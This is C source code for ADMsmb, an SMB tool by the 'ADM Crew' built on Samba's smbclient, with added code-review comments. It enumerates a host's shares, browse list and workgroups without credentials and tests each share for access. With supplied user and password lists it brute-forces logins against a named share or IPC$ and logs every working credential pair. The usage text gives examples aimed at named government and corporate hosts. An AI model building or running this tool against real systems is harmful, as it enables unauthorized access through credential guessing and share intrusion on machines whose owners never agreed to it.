/*
 * ADMsmb front end: SMB share enumeration and credential testing built on the
 * Samba smbclient code base.  This file pulls in the Samba headers via
 * "includes.h" and the helper translation unit "ADMsmb.c"; most of the globals
 * below mirror smbclient's and are consumed by Samba client-library functions
 * (cli_*, send_smb, client_receive_smb, ...) that are not visible here.
 */
#define VERSION_ADM_SMB "0.3 FreeBSD"
/* default log file, used by main() when -o is not given */
#define TRACEDEF "ADMsmb.output"

#ifndef _QCOMPR
#define _QCOMPR
/*
 * qsort() comparator used by browse_host() to sort the raw RNetShareEnum
 * records in place.  Each record is 20 bytes and begins with the share name
 * (the "B13" field of the data descriptor), so comparing records as C strings
 * compares the names.
 * NOTE(review): strcasecmp() is called before any header is included, so it is
 * implicitly declared at this point.  The comparison also relies on a NUL
 * inside the 13-byte name field -- confirm against the wire format.  _QCOMPR
 * is a reserved identifier (leading underscore followed by an upper-case letter).
 */
int qcompr(const void *a, const void *b)
{
    return strcasecmp((const char *) a, (const char *) b);
}
#endif

/* SYSLOG is undefined before the Samba headers are pulled in; the reason is not visible here */
#ifdef SYSLOG
#undef SYSLOG
#endif

#include "includes.h"
#include "ADMsmb.c"   /* presumably provides ADMsmb() and host2ip() used by main() -- not visible here */

#ifndef REGISTER
#define REGISTER 0
#endif

/* smbclient heritage: remote working directory and its path form; not referenced in this file */
pstring cur_dir = "\\";
pstring cd_path = "";

/* connection parameters shared with the Samba client library */
extern pstring service;
extern pstring desthost;
extern pstring myname;
extern pstring myhostname;
extern pstring password;
extern pstring username;
extern pstring workgroup;
char *cmdstr = "";
extern BOOL got_pass;
extern BOOL no_pass;
extern BOOL connect_as_printer;
extern BOOL connect_as_ipc;
extern struct in_addr ipzero;
extern BOOL doencrypt;
extern pstring user_socket_options;

/*
 * Log stream: every browse/scan result is written here as well as to stdout.
 * NOTE(review): main() opens the default log with an unchecked fopen(), so this
 * can still be NULL when the file cannot be created; the fprintf(trace, ...)
 * calls in this file do not guard against that.
 */
FILE *trace = NULL;
/* set by -b; presumably consumed by the code in ADMsmb.c (not visible here) */
int silly_server = 0;

/* 30 second timeout on most commands */
#define CLIENT_TIMEOUT (30*1000)
#define SHORT_TIMEOUT (5*1000)

/* value for unused fid field in trans2 secondary request */
#define FID_UNUSED (0xFFFF)

extern int name_type;
extern int max_protocol;
time_t newer_than = 0;
int archive_level = 0;
extern pstring debugf;
extern int DEBUGLEVEL;
BOOL translation = False;
extern int cnum;
extern int mid;
extern int pid;
extern int tid;
extern int gid;
extern int uid;
extern BOOL have_ip;
extern int max_xmit;

/* smbclient directory-listing helpers: declared here but not defined in this file */
static int interpret_long_filename (int level, char *p, file_info * finfo);
static void dir_action (char *inbuf, char *outbuf, int attribute, file_info * finfo, BOOL recurse_dir, void (*fn) (file_info *), BOOL longdir, BOOL dirstoo);
static int interpret_short_filename (char *p, file_info * finfo);
static BOOL do_this_one (file_info * finfo);

/* clitar bits insert */
extern int blocksize;
extern BOOL tar_inc;
extern BOOL tar_reset;
/* clitar bits end */

int myumask = 0755;
extern pstring scope;
BOOL prompt = True;
int printmode = 1;
BOOL recurse = False;
BOOL lowercase = False;
struct in_addr dest_ip;

#define SEPARATORS " \t\n\r"

BOOL abort_mget = True;
extern int Protocol;
extern BOOL readbraw_supported;
extern BOOL writebraw_supported;
pstring fileselection = "";
extern file_info def_finfo;

/* timing globals */
int get_total_size = 0;
int get_total_time_ms = 0;
int put_total_size = 0;
int put_total_time_ms = 0;

/* totals globals */
int dir_total = 0;
extern int Client;

/*
 * the ADMhack variable
 * Share names collected by browse_host(): calloc'd strings, filled from index 0
 * and walked by ADMsmb2() until the first NULL.  Static storage, so all slots
 * start out NULL.
 * NOTE(review): fixed capacity of 255 with no bounds check in browse_host(); a
 * server reporting 255 or more shares fills every slot (no NULL terminator) or
 * writes past the array.
 */
char *SHARELIST[255];

#define USENMB
#define CNV_LANG(s) dos_to_unix(s,False)
#define CNV_INPUT(s) unix_to_dos(s,True)

/****************************************************************************
send an SMBclose on an SMB file handle
****************************************************************************/
/*
 * Build an SMBclose for file handle f_num on tree c_num into outbuf, send it on
 * clnt_fd and read the reply into inbuf.  inbuf/outbuf are caller-provided
 * SMB-sized buffers.  The reply is not inspected: neither the result of
 * client_receive_smb() nor the reply's error class is checked, so a failed or
 * timed-out close is invisible to the caller.
 */
void cli_smb_close (char *inbuf, char *outbuf, int clnt_fd, int c_num, int f_num)
{
    bzero (outbuf, smb_size);
    set_message (outbuf, 3, 0, True);   /* word count 3, byte count 0 */
    CVAL (outbuf, smb_com) = SMBclose;
    SSVAL (outbuf, smb_tid, c_num);
    cli_setup_pkt (outbuf);
    SSVAL (outbuf, smb_vwv0, f_num);
    SIVALS (outbuf, smb_vwv1, -1);      /* last-write time field; -1 presumably means "leave unchanged" -- confirm */
    send_smb (clnt_fd, outbuf);
    client_receive_smb (clnt_fd, inbuf, CLIENT_TIMEOUT);
}

/****************************************************************************
make a directory of name "name"
****************************************************************************/
/*
 * Send an SMBmkdir for "name" on the current tree (global cnum) over the global
 * Client socket.  Returns True when the reply's error class is 0; False when a
 * buffer could not be allocated or the server returned an error (logged via DEBUG).
 * NOTE(review): the reply is read with client_receive_smb() but its return
 * value is ignored, so on a timeout smb_rcls is read from the freshly malloc'd
 * (uninitialised) inbuf.  name is copied with pstrcpy() and its length drives
 * set_message() without being compared to BUFFER_SIZE.
 */
static BOOL do_mkdir (char *name)
{
    char *p;
    char *inbuf, *outbuf;
    inbuf = (char *) malloc (BUFFER_SIZE + SAFETY_MARGIN);
    outbuf = (char *) malloc (BUFFER_SIZE + SAFETY_MARGIN);
    if (!inbuf || !outbuf) {
        /* NOTE(review): whichever of the two buffers did get allocated leaks here */
        DEBUG (0, ("out of memory\n"));
        return False;
    }
    bzero (outbuf, smb_size);
    set_message (outbuf, 0, 2 + strlen (name), True);   /* data: format byte + name + NUL */
    CVAL (outbuf, smb_com) = SMBmkdir;
    SSVAL (outbuf, smb_tid, cnum);
    cli_setup_pkt (outbuf);
    p = smb_buf (outbuf);
    *p++ = 4;   /* SMB buffer-format byte for an ASCIIZ string */
    pstrcpy (p, name);
    send_smb (Client, outbuf);
    client_receive_smb (Client, inbuf, CLIENT_TIMEOUT);
    if (CVAL (inbuf, smb_rcls) != 0) {
        DEBUG (0, ("%s making remote directory %s\n", smb_errstr (inbuf), CNV_LANG (name)));
        free (inbuf);
        free (outbuf);
        return (False);
    }
    free (inbuf);
    free (outbuf);
    return (True);
}
/****************************************************************************
try and browse available connections on a host
****************************************************************************/
/*
 * Enumerate the shares of the currently connected server with the LANMAN
 * RNetShareEnum RAP call (api number 0, info level 1), print them to stdout
 * and to trace, and (re)populate the global SHARELIST with calloc'd copies of
 * the share names.
 * sort: when True, the 20-byte share records are qsort()ed in place with qcompr().
 * Returns True when the server returned at least one share; False when the API
 * call failed, the server reported an error (res != 0) or no shares.
 *
 * NOTE(review): everything after the call trusts server-supplied values:
 *  - count is read from rparam and used as the loop bound without being
 *    compared to rdrcnt (records may be read past the returned data) or to
 *    the 255 slots of SHARELIST (SHARELIST[i] is written out of bounds for a
 *    server returning more than 255 shares);
 *  - comment_offset and converter index into rdata unchecked;
 *  - strlen(sname) assumes a NUL inside the 13-byte name field.
 * A hostile or broken server can therefore corrupt this client's memory.
 * trace is written to without a NULL check.
 */
static BOOL browse_host (BOOL sort)
{
#ifdef NOSTRCASECMP
/* If strcasecmp is already defined, remove it. */
#ifdef strcasecmp
#undef strcasecmp
#endif /* strcasecmp */
#define strcasecmp StrCaseCmp
#endif /* NOSTRCASECMP */
    char *rparam = NULL;
    char *rdata = NULL;
    char *p;
    int rdrcnt, rprcnt;
    pstring param;
    int count = -1;

    /* now send a SMBtrans command with api RNetShareEnum */
    p = param;
    SSVAL (p, 0, 0);   /* api number */
    p += 2;
    pstrcpy (p, "WrLeh");   /* parameter descriptor */
    p = skip_string (p, 1);
    pstrcpy (p, "B13BWz");  /* data descriptor: 13-byte name, pad byte, type word, comment pointer */
    p = skip_string (p, 1);
    SSVAL (p, 0, 1);   /* info level */
    SSVAL (p, 2, BUFFER_SIZE);   /* receive buffer size */
    p += 4;

    if (cli_call_api (PIPE_LANMAN, 0, PTR_DIFF (p, param), 0, 0, 1024, BUFFER_SIZE, &rprcnt, &rdrcnt, param, NULL, NULL, &rparam, &rdata)) {
        int res = SVAL (rparam, 0);
        int converter = SVAL (rparam, 2);
        int i;
        BOOL long_share_name = False;   /* set below but never read */

        if (res == 0) {
            count = SVAL (rparam, 4);
            p = rdata;
            if (count > 0) {
                printf ("\n\tSharename Type Comment\n");
                printf ("\t--------- ---- -------\n");
                fprintf (trace, "\n\tSharename Type Comment\n");
                fprintf (trace, "\t--------- ---- -------\n");
            }
            if (sort)
                qsort (p, count, 20, qcompr);   /* 20-byte records; qcompr compares the leading name */

            /* discard the previous share list before refilling it */
            for (i = 0; i < 255; i++) {
                free (SHARELIST[i]);
                SHARELIST[i] = NULL;
            }

            for (i = 0; i < count; i++) {
                char *sname = p;
                int type = SVAL (p, 14);
                int comment_offset = IVAL (p, 16) & 0xFFFF;
                fstring typestr;
                *typestr = 0;   /* unknown types print as an empty column */
                switch (type) {
                case STYPE_DISKTREE: fstrcpy (typestr, "Disk"); break;
                case STYPE_PRINTQ: fstrcpy (typestr, "Printer"); break;
                case STYPE_DEVICE: fstrcpy (typestr, "Device"); break;
                case STYPE_IPC: fstrcpy (typestr, "IPC"); break;
                }
                printf ("\t%-15.15s%-10.10s%s\n", sname, typestr, comment_offset ? rdata + comment_offset - converter : "");
                fprintf (trace, "\t%-15.15s%-10.10s%s\n", sname, typestr, comment_offset ? rdata + comment_offset - converter : "");
                SHARELIST[i] = calloc (1, strlen (sname) + 1);
                /* NOTE(review): this tests the array itself, which can never be NULL;
                 * the intended check is SHARELIST[i] == NULL, so a failed calloc()
                 * reaches the memcpy() below with a NULL destination. */
                if (SHARELIST == NULL)
                    printf ("behu sharelist == null !\n");
                memcpy (SHARELIST[i], sname, strlen (sname));
                if (strlen (sname) > 8)
                    long_share_name = True;
                p += 20;
            }
        }
    }

    if (rparam)
        free (rparam);
    if (rdata)
        free (rdata);
    return (count > 0);
}

/****************************************************************************
get some server info
****************************************************************************/
/*
 * Query the server with RAP api 63 (NetServerGetInfo, per the comment) at
 * level 10 and print server name, user, workgroup and domain.  Output goes to
 * stdout only, not to trace.  Failures are silent: a failed call or a non-zero
 * res prints nothing.
 * NOTE(review): the four string offsets are read from rdata and dereferenced
 * without being checked against rdrcnt.  The field labelled Domain is read at
 * offset 14; the layout behind "zzzBBzz" is not verified here.
 */
static void server_info (void)
{
    char *rparam = NULL;
    char *rdata = NULL;
    char *p;
    int rdrcnt, rprcnt;
    pstring param;

    bzero (param, sizeof (param));
    p = param;
    SSVAL (p, 0, 63);   /* NetServerGetInfo()? */
    p += 2;
    pstrcpy (p, "WrLh");
    p = skip_string (p, 1);
    pstrcpy (p, "zzzBBzz");
    p = skip_string (p, 1);
    SSVAL (p, 0, 10);   /* level 10 */
    SSVAL (p, 2, 1000);
    p += 6;   /* only 4 bytes were written above; the 2 extra bytes sent are zeros from bzero() */

    if (cli_call_api (PIPE_LANMAN, 0, PTR_DIFF (p, param), 0, 0, 6, 1000, &rprcnt, &rdrcnt, param, NULL, NULL, &rparam, &rdata)) {
        int res = SVAL (rparam, 0);
        int converter = SVAL (rparam, 2);
        if (res == 0) {
            p = rdata;
            printf ("\nServer=[%s] User=[%s] Workgroup=[%s] Domain=[%s]\n", rdata + SVAL (p, 0) - converter, rdata + SVAL (p, 4) - converter, rdata + SVAL (p, 8) - converter, rdata + SVAL (p, 14) - converter);
        }
    }

    if (rparam)
        free (rparam);
    if (rdata)
        free (rdata);
    return;
}

/****************************************************************************
try and browse available connections on a host
****************************************************************************/
/*
 * Retrieve the server's browse list with RAP api 0x68 at level 1: first the
 * servers (SV_TYPE_ALL) of workgroup wk_grp, then the list of workgroups
 * (SV_TYPE_DOMAIN_ENUM).  Both lists are printed to stdout and to trace.
 * When wk_grp equals "WORKGROUP" (strequal) no workgroup name is sent
 * (descriptor "WrLehDO" instead of "WrLehDz").
 * The request buffer is built once and reused for the second call; only the
 * server-type DWORD at svtype_p is rewritten.
 * Returns True if either enumeration yielded at least one entry.
 * NOTE(review): as in browse_host(), count and comment_offset come from the
 * server and are not checked against rdrcnt; records are assumed to be 26 bytes.
 * trace is written to without a NULL check.
 */
static BOOL list_servers (char *wk_grp)
{
    char *rparam = NULL;
    char *rdata = NULL;
    int rdrcnt, rprcnt;
    char *p, *svtype_p;
    pstring param;
    int uLevel = 1;
    int count = 0;
    BOOL ok = False;
    BOOL generic_request = False;

    if (strequal (wk_grp, "WORKGROUP")) {
        /* we won't specify a workgroup */
        generic_request = True;
    }

    /* now send a SMBtrans command with api ServerEnum? */
    p = param;
    SSVAL (p, 0, 0x68);   /* api number */
    p += 2;
    pstrcpy (p, generic_request ? "WrLehDO" : "WrLehDz");
    p = skip_string (p, 1);
    pstrcpy (p, "B16BBDz");
    p = skip_string (p, 1);
    SSVAL (p, 0, uLevel);
    SSVAL (p, 2, BUFFER_SIZE - SAFETY_MARGIN);   /* buf length */
    p += 4;
    svtype_p = p;   /* server-type mask, filled in before each call */
    p += 4;
    if (!generic_request) {
        pstrcpy (p, wk_grp);
        p = skip_string (p, 1);
    }

    /* first ask for a list of servers in this workgroup */
    SIVAL (svtype_p, 0, SV_TYPE_ALL);
    if (cli_call_api (PIPE_LANMAN, 0, PTR_DIFF (p + 4, param), 0, 0, 8, BUFFER_SIZE - SAFETY_MARGIN, &rprcnt, &rdrcnt, param, NULL, NULL, &rparam, &rdata)) {
        int res = SVAL (rparam, 0);
        int converter = SVAL (rparam, 2);
        int i;
        if (res == 0) {
            char *p2 = rdata;
            count = SVAL (rparam, 4);
            if (count > 0) {
                printf ("\n\nThis machine has a browse list:\n");
                printf ("\n\tServer Comment\n");
                printf ("\t--------- -------\n");
                fprintf (trace, "\n\nThis machine has a browse list:\n");
                fprintf (trace, "\n\tServer Comment\n");
                fprintf (trace, "\t--------- -------\n");
            }
            for (i = 0; i < count; i++) {
                char *sname = p2;
                int comment_offset = IVAL (p2, 22) & 0xFFFF;
                printf ("\t%-16.16s %s\n", sname, comment_offset ? rdata + comment_offset - converter : "");
                fprintf (trace, "\t%-16.16s %s\n", sname, comment_offset ? rdata + comment_offset - converter : "");
                ok = True;
                p2 += 26;
            }
        }
    }

    /* release the first reply; the pointers are reused by the second call */
    if (rparam) {
        free (rparam);
        rparam = NULL;
    }
    if (rdata) {
        free (rdata);
        rdata = NULL;
    }

    /* now ask for a list of workgroups */
    SIVAL (svtype_p, 0, SV_TYPE_DOMAIN_ENUM);
    if (cli_call_api (PIPE_LANMAN, 0, PTR_DIFF (p + 4, param), 0, 0, 8, BUFFER_SIZE - SAFETY_MARGIN, &rprcnt, &rdrcnt, param, NULL, NULL, &rparam, &rdata)) {
        int res = SVAL (rparam, 0);
        int converter = SVAL (rparam, 2);
        int i;
        if (res == 0) {
            char *p2 = rdata;
            count = SVAL (rparam, 4);
            if (count > 0) {
                printf ("\n\nThis machine has a workgroup list:\n");
                printf ("\n\tWorkgroup Master\n");
                printf ("\t--------- -------\n");
                fprintf (trace, "\n\nThis machine has a workgroup list:\n");
                fprintf (trace, "\n\tWorkgroup Master\n");
                fprintf (trace, "\t--------- -------\n");
            }
            for (i = 0; i < count; i++) {
                char *sname = p2;
                int comment_offset = IVAL (p2, 22) & 0xFFFF;
                printf ("\t%-16.16s %s\n", sname, comment_offset ? rdata + comment_offset - converter : "");
                fprintf (trace, "\t%-16.16s %s\n", sname, comment_offset ? rdata + comment_offset - converter : "");
                ok = True;
                p2 += 26;
            }
        }
    }

    if (rparam)
        free (rparam);
    if (rdata)
        free (rdata);
    return (ok);
}

/****************************************************************************
main program
****************************************************************************/
/*
 * Entry point.  argv[1] is always taken as the target host; the remaining
 * arguments go through getopt(): -u user list, -p password list, -d share or
 * directory to test, -b sets silly_server, -o log file.  "x:" and "n" are in
 * the getopt string but fall into default: and are ignored.  Resolves the host
 * (host2ip), asks for its NetBIOS name (ADMsmb(), both not visible in this
 * file) and hands over to ADMsmb2().
 * Declared with an implicit int return type and falls off the end without a
 * return statement.  ADMsmb2() is defined later in this file without a prior
 * prototype, so it is implicitly declared at the call sites.
 * NOTE(review): argv[1] is memcpy()'d into the 255-byte hostoname using
 * strlen(argv[1]) as the length, so an argument of 255 or more bytes leaves it
 * unterminated or overflows the stack buffer.  The fopen() of TRACEDEF is not
 * checked, so trace may remain NULL and is then passed to fprintf() here and in
 * ADMsmb2().  Because argv[1] is read before getopt(), an option given first is
 * treated as the host name.
 */
main (int argc, char **argv)
{
    FILE *U = NULL;   /* user list from -u */
    FILE *P = NULL;   /* password list from -p */
    int c;
    char didi[255];      /* share/directory from -d; stays empty when not given */
    char hostoname[255]; /* target host from argv[1] */
    char netbioz[255];   /* NetBIOS name filled in by ADMsmb() */
    u_long bha;          /* resolved address from host2ip() */

    bzero (didi,sizeof(didi));
    bzero (hostoname,sizeof(hostoname));
    bzero (netbioz,sizeof(netbioz));

    if ( argc < 2 ) {
        printf ("*** The ADM Crew, ported to FreeBSD by *IRQ* ***\n");
        printf ("ADMsmb %s\n",VERSION_ADM_SMB);
        printf ("usage: ADMsmb [-u -p -d -o -b]\n");
        printf ("-u : userlist\n");
        printf ("-p : passwordlist\n");
        printf ("-d : directory to bruteforce\n");
        printf ("-o : logfile \n");
        printf ("-b : try this if ADM-smb can't get netbios name of remote host \n");
        printf (" note: you need to run ADM-smb at root to use -b \n");
        printf ("example\n" "simple scan:\n" "ADMsmb www.burn.ms.com\n\n" "brute force a directory:\n" "ADMsmb www.burn.hp.com -d HOMES -u userlist -p passwdlst\n\n" "brute force a session:\n" "ADMsmb www.burn-down_the.gov -u userlist -p passwdlst\n\n");
        printf ("dont forget to log use -o =)!\n");
        printf ("note: we log by default in %s\n",TRACEDEF);
        exit (-1);
    }

    memcpy (hostoname,argv[1],strlen(argv[1]));   /* NOTE(review): unbounded, see header comment */

    while ((c = getopt(argc, argv,"u:p:d:bo:x:n")) != -1) {
        switch (c) {
        case 'u':
            U = fopen (optarg,"r");
            if ( U == NULL ) {
                printf ("failed to open the username file!\n");
                exit (-1);
            }
            break;
        case 'p':
            P = fopen (optarg,"r");
            if ( P == NULL ) {
                printf("failed to open password file !\n");
                exit (-1);
            }
            break;
        case 'd':
            /* NOTE(review): didi is 255 bytes but pstrcpy() bounds to the pstring size -- confirm they agree */
            pstrcpy (didi,optarg);
            break;
        case 'b':
            silly_server=1;
            break;
        case 'o':
            trace = fopen(optarg,"w");
            if ( trace == NULL ) {
                printf("failed to open log file !\n");
                exit (-1);
            }
            break;
        default:
            break;
        }
    }

    if ( trace == NULL)
        trace = fopen(TRACEDEF,"w");   /* result not checked */

    puts(" ADM-smb 0.3 FreeBSD version by *IRQ* ");
    sleep (1);
    bha = host2ip(hostoname);
    if ( ADMsmb (bha,netbioz) == -1 ) {
        printf ("cant get the netbios name :>\n");
        exit(-1);
    }
    printf("netbios name of %s is %s\n",hostoname,netbioz);
    fprintf(trace," scan of %s \n",hostoname);

    /* -d given: pass the share name; otherwise NULL selects scan / session mode in ADMsmb2() */
    if ( didi[0] != 0 )
        ADMsmb2 ( hostoname, netbioz,didi, U, P);
    else
        ADMsmb2 ( hostoname, netbioz,NULL, U, P);
    fclose (trace);
}

/**************************************************************************/
/* here is the mainly function ! */
/* ADMsmb2( hostname, netbios name, directory , userfile , password file */
/* if Direc == NULL && userfile == NULL && password file */
/* simple scaning */
/* if Direc != NULL && usefile != NULL && password file != NULL */
/* brute force the directory "Direc" */
/* if Direc == NULL && userfile != NULL && password file != NULL */
/* brute force a session (ideal for NT4 system who dont allow you to */
/* browse the host without login /password ) */
/**************************************************************************/
/*
 * Core driver.  Sets up the Samba client globals (default credentials
 * ADMINISTRATOR / empty password, workgroup WORKGROUP, dest_ip from ipz,
 * myname from netbios_name) and then runs one of three modes:
 *  1. userfile and passwdfile both NULL: connect to \\host\IPC$ with the
 *     defaults, print server_info()/browse_host()/list_servers(), then attempt
 *     a session on every share collected in SHARELIST and report
 *     "ACCESS GRANTED" or "Secure" for each.
 *  2. Direc != NULL: for every user in userfile and every password in
 *     passwdfile, call test_passwd() against \\host\Direc.
 *  3. Direc == NULL with both files given: same loop with test_passwd_nt()
 *     against IPC$.
 * Modes 2 and 3 additionally require SHARELIST[0] == NULL, which holds
 * whenever the anonymous browse of mode 1 was skipped or found nothing.
 * Returns -1 when the initial socket could not be opened; every other path
 * falls off the end of this int function without a return value.
 *
 * NOTE(review):
 *  - Mode 2 is entered when Direc != NULL regardless of userfile/passwdfile,
 *    so "-d" without "-u"/"-p" reaches feof(NULL).
 *  - In the share loop, listnum++ is inside if (cli_open_sockets(port)), so a
 *    failed socket open retries the same share forever.
 *  - The credential loops use while(!feof()) with unchecked fgets() into
 *    17-byte buffers: entries longer than 16 characters are split across
 *    iterations, and an entry without a trailing '\n' (e.g. the last line of
 *    the file) is skipped by the continue.
 *  - The two "ACCESS GRANTED" printf/fprintf calls in the share loop pass an
 *    extra argument (service) that their format strings do not consume.
 *  - Most of the locals below (base_directory, opt, dbf, optarg, optind,
 *    message, nt_domain_logon, tar_type, servicesf, term_code,
 *    new_name_resolve_order, p, save_debuglevel) are never used.
 *  - test_passwd()/test_passwd_nt() are defined below this function and no
 *    prototype is visible in this file, so they are implicitly declared here.
 *  - trace is written to without a NULL check; SHARELIST[listnum] is read up to
 *    index 255 when every slot is filled (no NULL terminator).
 */
int ADMsmb2 ( char *ipz, char netbios_name[255], char *Direc, FILE * userfile, FILE * passwdfile)
{
    fstring base_directory;
    char *pname = "ADMsmb";
    char USERNAME_[17];   /* one user-list entry, at most 16 characters */
    char PASSWORD_[17];   /* one password-list entry, at most 16 characters */
    int port = SMB_PORT;
    int opt;
    extern FILE *dbf;
    extern char *optarg;
    extern int optind;
    pstring query_host;   /* NetBIOS name used in every \\host\share path */
    BOOL message = False;
    BOOL nt_domain_logon = False;
    extern char tar_type;
    static pstring servicesf = CONFIGFILE;
    pstring term_code;
    pstring new_name_resolve_order;
    char *p;
    char *titpointeur;   /* position of the '\n' in the current list entry */
    int save_debuglevel = -1;
    int listnum = 0;     /* index into SHARELIST for the share scan */

    *term_code = 0;
    *query_host = 0;
    *base_directory = 0;
    *new_name_resolve_order = 0;

    DEBUGLEVEL = 2;
    setup_logging (pname, True);
    TimeInit ();
    charset_initialise ();
    pid = 0;
    uid = 0;
    gid = 0;
    mid = 0 + 100;

    /* default credentials for the anonymous browse; strupper() uppercases all three */
    pstrcpy (username, "ADMINISTRATOR");
    strupper (username);
    pstrcpy (password, "");
    strupper (password);
    pstrcpy (workgroup, "WORKGROUP");
    strupper (workgroup);

    dest_ip = *interpret_addr2 (ipz);
    have_ip = True;
    pstrcpy (myname, netbios_name);
    pstrcpy (query_host, netbios_name);

    /* here we trying to connect without pass */
    got_pass = 0;
    if (!get_myname (myhostname, NULL)) {
        DEBUG (0, ("Failed to get my hostname.\n"));
    }
    load_interfaces ();

    /* trying to browse the victim */
    if (passwdfile == NULL && userfile == NULL) {
        slprintf (service, sizeof (service) - 1, "\\\\%s\\IPC$", query_host);
        strupper (service);
        connect_as_ipc = True;
        if (cli_open_sockets (port)) {
            if (cli_send_login (NULL, NULL, True, True, NULL) != False) {
                server_info ();
                /* each enumeration is retried once after a pause if it reports nothing */
                if (!browse_host (True)) {
                    sleep (1);
                    browse_host (True);
                }
                if (!list_servers (workgroup)) {
                    sleep (1);
                    list_servers (workgroup);
                }
                cli_send_logout (NULL, NULL);
            }
            close_sockets ();
        } else {
            printf ("samba session fallied :-<\n");
            return (-1);
        }
    }

    /* mode 1, second half: try a session on every share found above */
    if (SHARELIST[listnum] != NULL && userfile == NULL) {
        printf ("> scan of %s <\n\n", ipz);
        while (SHARELIST[listnum] != NULL) {
            slprintf (service, sizeof (service) - 1, "\\\\%s\\%s", query_host, SHARELIST[listnum]);
            strupper (service);
            if (cli_open_sockets (port)) {
                if (strcmp (SHARELIST[listnum], "IPC$") == 0)
                    connect_as_ipc = True;
                else
                    connect_as_ipc = 0;
                printf ("checking %s ", service);
                fprintf (trace,"checking %s ", service);
                if (cli_send_login (NULL, NULL, True, True, NULL) != False) {
                    printf ("\t\033[32mACCESS GRANTED\033[0m\n", service);
                    fprintf (trace, "\tACCESS GRANTED\n", service);
                    cli_send_logout (NULL, NULL);
                } else {
                    printf ("\tSecure \n");
                    fprintf (trace, "\tSecure \n");
                }
                close_sockets ();
                listnum++;   /* NOTE(review): only advanced when the socket opened */
            }
        }
    }

    /* We perform a brute force ! on a directory */
    if (Direc != NULL && SHARELIST[0] == NULL) {
        printf ("<---> We perform a brutal force on %s for the directory %s <--->\n", ipz, Direc);
        fprintf (trace, "<---> We perform a brutal force on %s for the directory %s <--->\n" ,ipz, Direc);
        while (!feof (userfile)) {
            memset (USERNAME_, 0, sizeof (USERNAME_));
            fgets (USERNAME_, sizeof (USERNAME_), userfile);
            printf ("\n\n");
            /* strip the newline; an entry without one is skipped */
            titpointeur = strchr (USERNAME_, '\n');
            if (titpointeur != NULL)
                *(titpointeur + 0) = 0;
            else
                continue;
            while (!feof (passwdfile)) {
                memset (PASSWORD_, 0, sizeof (PASSWORD_));
                fgets (PASSWORD_, sizeof (PASSWORD_), passwdfile);
                titpointeur = strchr (PASSWORD_, '\n');
                if (titpointeur != NULL)
                    *(titpointeur + 0) = 0;
                else
                    continue;
                if (test_passwd (USERNAME_, PASSWORD_, query_host, Direc) == 1) {
                    printf ("\033[31m<--->\033[32m ACCESS GRANTED \033[31m<--->\033[0m\n" "\033[31m<--->\033[0m\033[1m %s //%s/%s login:%s password: %s \033[0m\033[31m<--->\033[0m\n\n", ipz, query_host, Direc, USERNAME_, PASSWORD_);
                    fprintf (trace, "<--->ACCESS GRANTED <--->\n" "**** <---> %s //%s/%s login:%s password: %s <---> ****\n\n", ipz, query_host, Direc, USERNAME_, PASSWORD_);
                } else
                    printf ("<---> Session failed with %s %s for //%s/%s <--->\n", USERNAME_, PASSWORD_, query_host, Direc);
            }
            rewind (passwdfile);   /* restart the password list for the next user */
        }
    }

    /* mode 3: session test against IPC$ with each user/password pair */
    if (Direc == NULL && SHARELIST[0] == NULL && userfile != NULL && passwdfile != NULL) {
        printf ("<---> We trying to etablish a session on %s and browse is share list<--->\n", ipz);
        fprintf (trace, "<---> We trying to etablish a session on %s and browse is share list<--->\n", ipz);
        while (!feof (userfile)) {
            memset (USERNAME_, 0, sizeof (USERNAME_));
            fgets (USERNAME_, sizeof (USERNAME_), userfile);
            printf ("\n\n");
            titpointeur = strchr (USERNAME_, '\n');
            if (titpointeur != NULL)
                *(titpointeur + 0) = 0;
            else
                continue;
            while (!feof (passwdfile)) {
                memset (PASSWORD_, 0, sizeof (PASSWORD_));
                fgets (PASSWORD_, sizeof (PASSWORD_), passwdfile);
                titpointeur = strchr (PASSWORD_, '\n');
                if (titpointeur != NULL)
                    *(titpointeur + 0) = 0;
                else
                    continue;
                if (test_passwd_nt (USERNAME_, PASSWORD_, query_host) == 1) {
                    printf ("\033[31m<--->\033[32m ACCESS GRANTED \033[31m<--->\033[0m\n" "\033[31m<--->\033[0m\033[1m login:%s password: %s \033[0m\033[31m<--->\033[0m\n\n", USERNAME_, PASSWORD_);
                    fprintf (trace, "<--->ACCESS GRANTED <--->\n" "**** <--->login:%s password: %s <---> ****\n\n", USERNAME_, PASSWORD_);
                } else
                    printf ("<---> Session failed with %s %s <--->\n", USERNAME_, PASSWORD_);
            }
            rewind (passwdfile);
        }
    }
}

/*
 * Attempt a session setup to \\nameofhost\IPC$ with LOGINZ/PASSWORDZ.
 * Overwrites the globals username, password (both uppercased by strupper(),
 * so the password is not sent as given) and service, and sets connect_as_ipc.
 * On a successful login it also runs browse_host() and list_servers()
 * (each retried once after a one-second pause if it reports nothing), which
 * print their results, then logs out.
 * Returns 1 when the login succeeded, -1 when the socket could not be opened
 * or the login was refused.
 */
int test_passwd_nt (char *LOGINZ, char *PASSWORDZ, char *nameofhost)
{
    int retour = -1;
    pstrcpy (username, LOGINZ);
    strupper (username);
    pstrcpy (password, PASSWORDZ);
    strupper (password);
    slprintf (service, sizeof (service) - 1, "\\\\%s\\IPC$", nameofhost);
    strupper (service);
    connect_as_ipc = True;
    if (cli_open_sockets (SMB_PORT)) {
        if (cli_send_login (NULL, NULL, True, True, NULL) != False) {
            retour = 1;
            if (!browse_host (True)) {
                sleep (1);
                browse_host (True);
            }
            if (!list_servers (workgroup)) {
                sleep (1);
                list_servers (workgroup);
            }
            cli_send_logout (NULL, NULL);
        }
        close_sockets ();
    }
    return (retour);
}

/*
 * Attempt a session setup to \\nameofhost\directory with LOGINZ/PASSWORDZ.
 * Overwrites the globals username, password (both uppercased by strupper())
 * and service, and clears connect_as_ipc once the socket is open.
 * Returns 1 when the login succeeded (the session is logged out again
 * immediately), -1 when the socket could not be opened or the login was refused.
 */
int test_passwd (char *LOGINZ, char *PASSWORDZ, char *nameofhost, char *directory)
{
    int retour = -1;
    pstrcpy (username, LOGINZ);
    strupper (username);
    pstrcpy (password, PASSWORDZ);
    strupper (password);
    slprintf (service, sizeof (service) - 1, "\\\\%s\\%s", nameofhost, directory);
    strupper (service);
    if (cli_open_sockets (SMB_PORT)) {
        connect_as_ipc = 0;
        if (cli_send_login (NULL, NULL, True, True, NULL) != False) {
            retour = 1;
            cli_send_logout (NULL, NULL);
        } else
            retour = -1;
        close_sockets ();
    }
    return (retour);
}